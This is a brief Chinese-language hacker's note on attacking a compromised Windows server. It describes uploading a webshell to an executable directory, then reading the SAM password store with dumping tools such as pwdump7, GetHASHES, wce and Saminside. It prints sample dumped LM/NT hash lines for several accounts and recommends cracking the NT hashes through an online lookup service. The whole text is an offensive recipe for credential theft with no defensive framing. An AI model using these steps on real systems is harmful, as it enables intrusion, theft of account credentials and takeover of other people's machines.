|
webshell 找能执行权限的目录上传
C:\Windows\System32\config\sam 内有windows 密码 利用工具把密码抓出来 samcopy 直接抓取 GetHASHES.exe $Local 返回当前系统所有的用户的哈希 pwdump7.exe 自动抓取哈希 都是用cmd 执行 来宾和system 一般都没有密码 wce.exe 自动抓哈希 Saminside 字典破解 破解sam密码 我一般用pwdump7 执行后返回 Administrator:500:7B59ACC609CD473AF50785CA52198E4D:92748A4523592194AF8963A1949FCA0B::: Guest:501:64C3E77603C7A3BF5A5E17C210A88A96:30CFBECB0A6FD6BADBAB21A275788798::: :503:4F07A12B796A954B583F6D0501D59953:A0D5FADC55DA895E937A93ED39669D76::: :504:9D8835529B6E728C4CEE482ECCDDD9CE:0A51EEE494AB8F940DB69BC2FCA4E648::: test:1001:F5942A1378FEC39E6ACBF03ADAEE3EB1:8DFE55D2D16AA9E2DA4F44412E897201::: 密码格式为
nt-hash 直接丢到cmd5里解密 可以得到密码
|
|
|
